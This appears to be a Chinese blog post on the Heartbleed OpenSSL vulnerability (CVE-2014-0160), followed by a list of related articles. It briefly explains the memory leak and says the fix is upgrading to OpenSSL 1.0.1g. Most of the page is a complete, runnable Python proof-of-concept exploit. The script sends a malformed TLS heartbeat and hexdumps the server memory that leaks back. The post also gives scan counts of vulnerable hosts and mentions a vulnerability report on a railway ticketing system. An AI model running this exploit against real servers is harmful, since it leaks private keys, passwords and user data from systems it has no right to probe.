在 heartbleed 的官网上有关于 CVE-2014-0160 漏洞的详细信息,这是关于 OpenSSL 的信息泄漏漏洞导致的安全问题。改 Heartbleed bug 可以让互联网的任何人读取系统保护内存,这种妥协密钥用于识别服务提供者和加密流量,用户名和密码的和实际的内容。该漏洞允许攻击者窃听通讯,并通过模拟服务提供者和用户来直接从服务提供者盗取数据。

目前该问题的解决可以通过升级到 OpenSSL 1.0.1g 版本。

Exploit:

openssl.py

 #!/usr/bin/python

 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)

 # The author disclaims copyright to this source code.

 import sys

 import struct

 import socket

 import time

 import select

 import re

 from optparse import OptionParser

 options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')

 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

 def h2bin(x):

     return x.replace(' ', '').replace('\n', '').decode('hex')

 hello = h2bin('''

 16 03 02 00  dc 01 00 00 d8 03 02 53

 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf

 bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00

 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88

 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c

 c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09

 c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44

 c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c

 c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11

 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04

 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19

 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08

 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13

 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00

 00 0f 00 01 01

 ''')

 hb = h2bin('''

 18 03 02 00 03

 01 40 00

 ''')

 def hexdump(s):

     for b in xrange(0, len(s), 16):

         lin = [c for c in s[b : b + 16]]

         hxdat = ' '.join('%02X' % ord(c) for c in lin)

         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)

         print '  %04x: %-48s %s' % (b, hxdat, pdat)

     print

 def recvall(s, length, timeout=5):

     endtime = time.time() + timeout

     rdata = ''

     remain = length

     while remain > 0:

         rtime = endtime - time.time()

         if rtime < 0:

             return None

         r, w, e = select.select([s], [], [], 5)

         if s in r:

             data = s.recv(remain)

             # EOF?

             if not data:

                 return None

             rdata += data

             remain -= len(data)

     return rdata

 def recvmsg(s):

     hdr = recvall(s, 5)

     if hdr is None:

         print 'Unexpected EOF receiving record header - server closed connection'

         return None, None, None

     typ, ver, ln = struct.unpack('>BHH', hdr)

     pay = recvall(s, ln, 10)

     if pay is None:

         print 'Unexpected EOF receiving record payload - server closed connection'

         return None, None, None

     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))

     return typ, ver, pay

 def hit_hb(s):

     s.send(hb)

     while True:

         typ, ver, pay = recvmsg(s)

         if typ is None:

             print 'No heartbeat response received, server likely not vulnerable'

             return False

         if typ == 24:

             print 'Received heartbeat response:'

             hexdump(pay)

             if len(pay) > 3:

                 print 'WARNING: server returned more data than it should - server is vulnerable!'

             else:

                 print 'Server processed malformed heartbeat, but did not return any extra data.'

             return True

         if typ == 21:

             print 'Received alert:'

             hexdump(pay)

             print 'Server returned error, likely not vulnerable'

             return False

 def main():

     opts, args = options.parse_args()

     if len(args) < 1:

         options.print_help()

         return

     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     print 'Connecting...'

     sys.stdout.flush()

     s.connect((args[0], opts.port))

     print 'Sending Client Hello...'

     sys.stdout.flush()

     s.send(hello)

     print 'Waiting for Server Hello...'

     sys.stdout.flush()

     while True:

         typ, ver, pay = recvmsg(s)

         if typ == None:

             print 'Server closed connection without sending Server Hello.'

             return

         # Look for server hello done message.

         if typ == 22 and ord(pay[0]) == 0x0E:

             break

     print 'Sending heartbeat request...'

     sys.stdout.flush()

     s.send(hb)

     hit_hb(s)

 if __name__ == '__main__':

     main()

来自ZoomEye的统计,全国443端口:1601250,有33303个受本次OpenSSL漏洞影响!

铁道部12306系统的漏洞被猪猪侠抢先了。结果我的被驳回了。详情见:

http://wooyun.org/bugs/wooyun-2014-055939

OpenSSL "heartbleed" 安全漏洞的更多相关文章

  1. OpenSSL重大漏洞-Heartbleed之漏洞利用脚本POC讲解

    OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read ...

  2. OpenSSL Heartbleed “心脏滴血”漏洞简单攻击示例

    OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一把. 单纯从攻击的角度讲,我已知道的,网上公开的扫描工具有: 1.  Nmap脚本ssl-heartblee ...

  3. OpenSSL Heartbleed "心脏滴血"漏洞简单攻击示例

    转自:http://www.lijiejie.com/openssl-heartbleed-attack/ OpenSSL Heartbleed漏洞的公开和流行让许多人兴奋了一把,也让另一些人惊慌了一 ...

  4. 升级OpenSSL修复高危漏洞Heartbleed

    升级OpenSSL修复高危漏洞Heartbleed 背景:          OpenSSL全称为Secure Socket Layer.是Netscape所研发.利用数据加密(Encryption) ...

  5. [漏洞复现] [Vulhub靶机] OpenSSL Heartbleed Vulnerability (CVE-2014-0160)

    免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x00 背景知识 传输层安全协议SSL 安全套接字协议SSL(Secure Sockets Layer),及其继任者传输层安 ...

  6. OpenSSL Heartbleed原因小结

    User发送心跳报文给Server,Server复制心跳报文的内容回应User. memcpy(bp, p1, payload); Server拷贝心跳报文的内容给Client时,如果拷贝的字节数目超 ...

  7. OpenSSL心脏出血漏洞全回顾

    近日网络安全界谈论的影响安全最大的问题就是Heartbleed漏洞,该漏洞是4月7号国外黑客曝光的.据Vox网站介绍,来自Codenomicon和谷歌安全部门的研究人员,发现OpenSSL的源代码中存 ...

  8. OpenSSL “心脏滴血”漏洞

    OpenSSL "心脏滴血"漏洞 漏洞描述 : OpenSSL软件存在"心脏出血"漏洞,该漏洞使攻击者能够从内存中读取多达64 KB的数据,造成信息泄露. 漏洞 ...

  9. 对OpenSSL心脏出血漏洞的试验

    1.安装OpenSSL环境 sudo apt-get install openssl sudo pip install pyopenssl(中间会提示ffi.h 没有那个文件或目录,sudo apt- ...

随机推荐

  1. WebService学习--股票走势图+天气预报实现

        互联网上面有很多的免费webService服务,我们可以调用这些免费的WebService服务,将一些其他网站的内容信息集成到我们的Web应用中显示,下面就以获取股票数据和天气预报为例进行学习 ...

  2. 比较Java中几个常用集合添加元素的效率

    初始化需要进行比较的集合,统一增加10万个元素,获取整个过程的执行时间. 1.List集合增加元素 private static void testList() { List<Integer&g ...

  3. 蓝桥杯-骰子游戏-java

    /* (程序头部注释开始) * 程序的版权和版本声明部分 * Copyright (c) 2016, 广州科技贸易职业学院信息工程系学生 * All rights reserved. * 文件名称: ...

  4. Openstack Swift 原理、架构与 API 介绍

    OpenStack Swift 开源项目提供了弹性可伸缩.高可用的分布式对象存储服务,适合存储大规模非结构化数据.本文将深入介绍 Swift 的基本设计原理.对称式的系统架构和 RESTful API ...

  5. Struts2拦截器登录验证

    Struts2拦截器 Struts2拦截器的概念和Spring Mvc拦截器一样. Struts2拦截器是在访问某个Action或Action的某个方法,字段之前或之后实施拦截,并且Struts2拦截 ...

  6. Vue项目的部署

    通过vue-cli创建的工程,默认已经打好了基础,包含vue-loader webpack. 通常我们开发中,使用npm run dev进行开发,webpack会Hot reload,不用我们手动刷新 ...

  7. Android开发之旅:环境搭建及HelloWorld(转)

    本系列适合0基础的人员,因为我就是从0开始的,此系列记录我步入Android开发的一些经验分享,望与君共勉!作为Android队伍中的一个新人的我,如果有什么不对的地方,还望不吝赐教. 在开始Andr ...

  8. Socket中的异常和参数设置

    1.常见异常 1.java.net.SocketTimeoutException . 这个异 常比较常见,socket 超时.一般有 2 个地方会抛出这个,一个是 connect 的 时 候 , 这 ...

  9. vim - manual -个人笔记

    ##vim配置 ###normal > 输入命令:w 写入保存 > > 粘贴 :p(向下粘贴) P(大写向上粘贴) > > 复制 :yy 复制一行 > > 删 ...

  10. Hive load from hdfs 出错

    hive 加载HDFS的数据时出现错误, FATAL:SemanticException [Error 10028] search了一下,跟他一样Hive load from hdfs 出错. 我按照 ...